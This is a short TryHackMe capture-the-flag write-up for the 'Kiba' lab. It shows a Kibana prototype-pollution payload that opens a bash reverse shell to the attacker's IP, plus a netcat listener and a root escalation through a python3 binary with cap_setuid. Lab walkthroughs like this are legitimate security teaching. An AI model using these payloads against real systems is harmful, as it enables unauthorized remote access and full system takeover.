Kiba — TryHackMe — WriteUp
Hello. I’m Rahmos. Here is my Kiba — TryHackMe — WriteUp. Check it out!
First, deploy the machine and nmap for opened ports.
nmap -A -T4 -p- -v <ip>
A webserver is running at port 80, SSH at port 22 and Kibana at port 5601.
Let’s access the kibana webpage and you’ll find the version under “Management”
Searching on Google:
This post contains the vulnerability of Kibana , and also the CVE number needed for the answers.
Next, refer to this repo on Github:
Choose any exploit as you want. But remember to change the ip address to your VPN ip and note the port.
For example:
.es(*).props(label.__proto__.env.AAAA=’require(“child_process”).exec(“bash -i >& /dev/tcp/<your-VPN-ip>/1234 0>&1”);process.exit()//’) .props(label.__proto__.env.NODE_OPTIONS=’ — require /proc/self/environ’)
Start a listener on your machine:
nc -lvnp 1234
Then do the above steps to open a reverse shell to your machine.
Now I’ve got the shell. Go around and get the 1st flag:
Now find a way to own root to get the final flag. First, find out what “linux capabilities” is:
To list all of capabilities file, use getcap
getcap -r / 2>/dev/null
** 2>/dev/null will move all error to null, so it won’t be printed out.
As you can see, python3 in kiba’s home folder has the capabilities: cap_setuid+ep. So let’s use this to get root.
**What is cap_setuid+ep?
Any command with this cap_setuid set is capable of setting uid. Also note that, root has uid 0. So, if I can set the uid to 0, I will be root!
home/kiba/.hackmeplease/python3 -c ‘import os; os.setuid(0); os.system(“/bin/bash”)’
Now I’m root! Get the final flag:
The end.
HAPPY HACKING
